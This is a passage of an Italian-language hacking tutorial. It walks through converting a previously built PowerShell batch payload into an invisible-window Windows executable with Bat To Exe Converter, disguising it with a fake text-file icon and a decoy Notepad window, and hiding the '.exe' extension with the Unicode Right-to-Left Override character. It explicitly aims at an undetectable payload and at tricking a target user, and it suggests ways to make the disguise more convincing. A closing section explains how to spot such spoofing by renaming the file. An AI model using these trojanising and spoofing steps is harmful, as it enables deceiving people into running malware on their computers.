Per scaricare B2E, il sito Web richiede agli utenti di minare la criptovaluta per diversi minuti in cambio del download del loro software gratuito . Se i lettori desiderano supportare lo sviluppatore B2E, passare alla pagina di download e prendere il software B2E più recente. Altrimenti, i lettori possono usare il mio mirror di una versione leggermente più vecchia di B2E .
Utilizzando il mio mirror GitHub, in Windows, visita l'URL seguente per scaricare B2E.
https://github.com/tokyoneon/B2E/raw/master/Bat_To_Exe_Converter.zip
Decomprimere il download ed eseguire il file "Bat_To_Exe_Converter_ (Installer) .exe" per installarlo.

Passaggio 5Importa il Payload BAT
Al termine, avvia B2E e fai clic sul pulsante "Apri" per importare il payload.bat creato in precedenza.

Passaggio 6Trojanizza il carico utile
Quindi, aggiungi la parola "blocco note" all'inizio del payload.bat e fai clic su "Salva". In questo modo l'eseguibile aprirà il Blocco note sul computer Windows prima di eseguire il payload di PowerShell. In questo modo l'utente di destinazione crederà che il file su cui ha appena fatto clic sia effettivamente un file di testo legittimo.

Ora, c'è molto che si può fare per convincere ulteriormente qualcuno che il file è legittimo. Ad esempio, se Blocco note non è il loro editor di testo predefinito, potrebbe sembrare sospetto che questo file apra Blocco note quando altri file di testo aprono Notepad ++ , un popolare editor di testo di terze parti. Quindi migliorare il BAT per aprire un programma predefinito, invece di Blocco note, potrebbe essere desiderabile. Inoltre, l'apertura di un Blocco note vuoto quando il file viene segnalato come di dimensioni 12 KB potrebbe anche essere sospetto, quindi trovare un modo per produrre testo o Trojanizzare l'EXE per scaricare prima un file di testo effettivo potrebbe aiutare a migliorare l'efficacia di tali attacchi.
Per semplicità, continuerò così com'è, con il BAT che apre un blocco note vuoto. Si spera che questo dimostrerà quanto sia facile creare trojan e portare i lettori sulla strada giusta per sviluppare questo attacco per soddisfare le loro esigenze individuali.Passaggio 7Converti ed esporta il carico utile
Fatto ciò, seleziona l'opzione "Icona" per abilitarlo e importa l'icona fakeTextFile.ico creata nel passaggio precedente utilizzando il pulsante "...". Quindi, modifica il formato Exe in "Windows a 64 bit | (invisibile)" per evitare che i terminali vengano visualizzati quando l'utente di destinazione apre il file.

Fare clic sul pulsante "Converti" per creare l'EXE e salvare il nome del file come fake.exe .

Dopo aver salvato fake.exe sul desktop e posizionato accanto a un vero file di testo, i lettori potrebbero notare una sottile linea rossa nell'icona fake che non esiste nell'icona del vero file di testo. Questo può essere facilmente risolto utilizzando un set di icone di Windows 10 migliore o utilizzando un diverso tipo di file per lo spoofing.Passaggio 8Spoof l'estensione del file con Unicode
Il problema più grande è l'estensione del file. Grazie all'opzione "Nascondi le estensioni per i tipi di file conosciuti" nelle opzioni di Esplora file, le estensioni dei file non vengono nascoste dal sistema operativo Windows. Per aggirare questo problema, usa un carattere Unicode chiamato " Right-to-Left Override " (RLO) per invertire l'ordine di visualizzazione dei caratteri nel nome del file. È importante capire poiché i personaggi non vengono effettivamente invertiti, il modo in cui Windows visualizza i caratteri viene invertito. Windows riconoscerà comunque l'estensione del file come EXE.

Come si vede nella GIF sopra, il carattere RLO invisibile viene inserito tra il nome del file ("fake") e l'estensione del file fake ("txt"). Tutto ciò che il carattere RLO sta facendo qui è invertire l'ordine in cui vengono visualizzati i caratteri nel nome del file. Sfortunatamente, "exe" deve rimanere nel nome del file falsificato.
Come proteggersi dagli attacchi di spoofing delle estensioni di file
Poiché il nostro obiettivo qui era quello di creare un payload non rilevabile, il software antivirus non è davvero una buona opzione per la protezione da questi tipi di attacchi di spoofing delle estensioni di file.
Una cosa che puoi fare è semplicemente mettere la lente d'ingrandimento quando guardi i file che scarichi da Internet. Nel nostro caso sopra, non sarai in grado di dire a prima vista che l'icona non è la stessa di altri file di testo, ma a un esame più attento, vedrai che qualcosa è sospetto.
Se sospetti di un file o della sua origine, prova a rinominarlo. Fare attenzione a non fare doppio clic su di esso. Invece, fai clic con il pulsante destro del mouse sul file e scegli l'opzione "Rinomina" dal menu contestuale. Se viene utilizzato Unicode, rinominare il file utilizzando i caratteri trovati sulle tastiere standard rimuoverà Unicode, rivelando la sua vera estensione.